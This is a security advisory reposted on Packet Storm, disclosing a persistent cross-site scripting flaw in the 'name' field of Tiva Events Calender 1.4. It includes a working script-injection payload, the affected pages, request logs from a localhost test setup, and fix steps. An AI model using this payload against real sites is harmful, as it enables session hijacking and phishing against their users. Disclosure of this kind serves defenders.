what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Tiva Events Calender 1.4 Cross Site Scripting

Tiva Events Calender 1.4 Cross Site Scripting
Posted Jul 19, 2023
Authored by Vulnerability Laboratory | Site vulnerability-lab.com

Tiva Events Calender version 1.4 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | ff6d43136930eb7be361f52eebe6e20e440999b2b18d5e0ec023055d03babdcd

Tiva Events Calender 1.4 Cross Site Scripting

Change Mirror Download
Document Title:
===============
Tiva Events Calender v1.4 - Cross Site Scripting Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2276


Release Date:
=============
2023-07-05


Vulnerability Laboratory ID (VL-ID):
====================================
2276


Common Vulnerability Scoring System:
====================================
5


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Events Calendar For PHP is a powerful PHP calendar script that can be easily integrated and used with various PHP projects,
such as scheduler, event handler, etc. The calendar is simple to install, deploy, and use. It is suitable for all types of
service businesses to get online reservations without any hassles.

(Copy of the Homepage:https://codecanyon.net/item/tiva-events-calendar-for-php/19199337 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent script code inject vulnerability in the Tiva Events Calender v1.4 web-application.


Affected Product(s):
====================
tiva_theme
Product: Tiva Events Calender - Calender PHP (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2021-04-03: Researcher Notification & Coordination (Security Researcher)
2021-04-04: Vendor Notification 1 (Security Department)
2021-06-24: Vendor Notification 2 (Security Department)
2021-07-13: Vendor Notification 3 (Security Department)
****-**-**: Vendor Response/Feedback (Security Department)
****-**-**: Vendor Fix/Patch (Service Developer Team)
****-**-**: Security Acknowledgements (Security Department)
2023-07-05: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (User Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Tiva Events Calender v1.4 web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser
to web-application requests from the application-side.

The vulnerability is located in the name input field and name parameter. Remote attackers privileged user accounts are able to inject
own malicious script codes as name. Thus results in a persistent execute of the script code in the backend on edit but as well in the
frontend (index) were the event is being displayed after the submit (save) via post method request. In the same direction it is possible
to inject malformed client-side executable script code in get request to trigger a non-persistent execution.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected frontend / backend application modules.

Request Method(s):
[+] POST / GET

Vulnerable Input(s):
[+] Name

Vulnerable Parameter(s):
[+] name

Affected Module(s):
[+] index.php (Frontend on Event Preview)
[+] edit.php (Backend on Edit ID)


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.


Exploitation: Payload
%20"<img src="evil.source" onload=alert(document.domain)>


Vulnerable Source: Frontend (Index)
<tr><td class="calendar-day-normal"><span class="calendar-day-weekend">8</span></td>
<td class="calendar-day-normal"><div class="calendar-day-file">9<div class="calendar-file-name color-4" onclick="downloadFile(220)">
<span class="event-name">event1"%20"<img src="evil.source" onload=alert(document.domain)></span></div></div></td><td class="calendar-day-normal">10</td>
<td class="calendar-day-normal">11</td><td class="calendar-day-normal">12</td><td class="calendar-day-normal">13</td>
<td class="calendar-day-normal"><span class="calendar-day-weekend">14</span></td></tr>


Vulnerable Source: Backend (Edit ID)
<section class="panel">
<header class="panel-heading"><i class="fa fa-folder-open"></i> Edit File</header>
<div class="panel-body">
<div class="alert alert-success">
<button data-dismiss="alert" class="close close-sm" type="button">
<i class="fa fa-times"></i>
</button>Report successfully saved.</div>
<form class="form-horizontal" action="edit.php?id=220" method="post" enctype="multipart/form-data">
<div class="form-group">
<label class="col-lg-2 col-sm-2 control-label">Name<span class="star">&nbsp;*</span></label>
<div class="col-sm-8">
<input type="text" name="name" class="form-control" value="event1"%20"<img src="evil.source" onload=alert(document.domain)>" required />
</div></div>


--- PoC Session Logs (POST) ---
https://tiva-cal.localhost:8080/admin/report/edit.php
Host: tiva-cal.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------249785717017581481612148649683
Content-Length: 745
Origin:https://tiva-cal.localhost:8080
Connection: keep-alive
Referer:https://tiva-cal.localhost:8080/admin/report/edit.php
Cookie: PHPSESSID=76gqk14e1s6cce40hfj11
name="%20%20"<img src="evil.source" onload=alert(document.domain)>&type=1&time=20-08-2021&file=temp.txt&save=
-
POST: HTTP/2.0 200 OK
server: nginx
content-type: text/html
content-length: 1283
etag: "503-53ed12f4ca761"
accept-ranges: bytes
strict-transport-security: max-age=15768000; includeSubDomains
-
https://tiva-cal.localhost:8080/admin/report/evil.source
Host: tiva-cal.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: image/webp,*/*
Connection: keep-alive
Referer:https://tiva-cal.localhost:8080/admin/report/edit.php?id=222
Cookie: PHPSESSID=76gqk14e1s6cce40hfj11
-
GET: HTTP/2.0 200 OK
server: nginx
content-type: text/html
content-length: 1283
etag: "503-53ed12f4ca761"
accept-ranges: bytes
strict-transport-security: max-age=15768000; includeSubDomains


Solution - Fix & Patch:
=======================
The vulnerability can be patched by the following steps ...
1. Encode and escape the name input field content on transmit via post method
2. Restrict the input field and disallow insert of special chars
3. Parse the output location on the index frontend via encode to sanitize and prevent the execute
4. Parse the output location on the edit id report backend via encode to sanitize and prevent the execute


Security Risk:
==============
The security risk of the persistent input validation vulnerability in the web-application is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™



--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    38 Files
  • 24
    Sep 24th
    65 Files
  • 25
    Sep 25th
    24 Files
  • 26
    Sep 26th
    26 Files
  • 27
    Sep 27th
    34 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close